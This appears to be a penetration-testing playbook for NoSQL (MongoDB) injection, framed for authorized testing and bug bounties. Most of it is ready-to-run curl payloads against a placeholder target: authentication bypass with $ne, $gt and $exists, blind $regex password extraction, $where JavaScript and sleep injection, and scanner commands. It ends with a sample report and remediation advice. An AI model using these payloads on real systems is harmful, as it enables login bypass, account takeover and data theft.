Exploiting NoSQL Injection Vulnerabilities

When to Use

• During web application penetration testing of applications using NoSQL databases
• When testing authentication mechanisms backed by MongoDB or similar databases
• When assessing APIs that accept JSON input for database queries
• During bug bounty hunting on applications with NoSQL backends
• When performing security code review of database query construction

Prerequisites

• Burp Suite Professional or Community Edition with JSON support
• NoSQLMap tool installed (pip install nosqlmap or from GitHub)
• Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
• Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
• Proxy configured for HTTP traffic interception
• Python 3.x for custom payload scripting

Workflow

Step 1 — Identify NoSQL Injection Points

# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin\"", "password": "test"}'

# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"

# Check for error-based detection
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt": ""}}'

Step 2 — Perform Authentication Bypass

# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'

# Bypass with $gt operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Target specific user with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": ".*"}}'

# Bypass using $exists operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$exists": true}, "password": {"$exists": true}}'

Step 3 — Extract Data Using Boolean-Based Blind Injection

# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^a"}}'

# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^ab"}}'

# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'

Step 4 — Exploit JavaScript Injection via $where

# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.username == \"admin\""}'

# Time-based detection with sleep
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "sleep(5000) || this.username == \"admin\""}'

# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.password.match(/^a/) != null"}'

Step 5 — Use NoSQLMap for Automated Testing

# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install

# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
  --method POST \
  --data '{"username":"test","password":"test"}'

# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'

Step 6 — Test URL Parameter Injection

# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"

# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"

# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
  -H "X-User-Id: {'\$ne': null}"

Key Concepts

| Concept | Description | |---------|-------------| | Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters | | Authentication Bypass | Using operators to match any document and bypass login checks | | Blind Extraction | Character-by-character data extraction using $regex boolean responses | | $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator | | Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) | | BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol | | Server-Side JS | JavaScript execution context available in MongoDB for query evaluation |

Tools & Systems

| Tool | Purpose | |------|---------| | NoSQLMap | Automated NoSQL injection detection and exploitation framework | | Burp Suite | HTTP proxy for intercepting and modifying JSON requests | | MongoDB Shell | Direct database interaction for testing query behavior | | nosqli | Dedicated NoSQL injection scanner and exploitation tool | | PayloadsAllTheThings | Curated NoSQL injection payload repository | | Nuclei | Template-based scanner with NoSQL injection detection templates | | Postman | API testing platform for crafting NoSQL injection requests |

Common Scenarios

1. Login Bypass — Bypass MongoDB-backed authentication using {"$ne": ""} operator injection in username and password fields
2. Data Enumeration — Extract database contents character by character using $regex blind injection when no direct output is visible
3. Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
4. API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
5. Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass

Output Format

## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)

### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |

### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator

### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls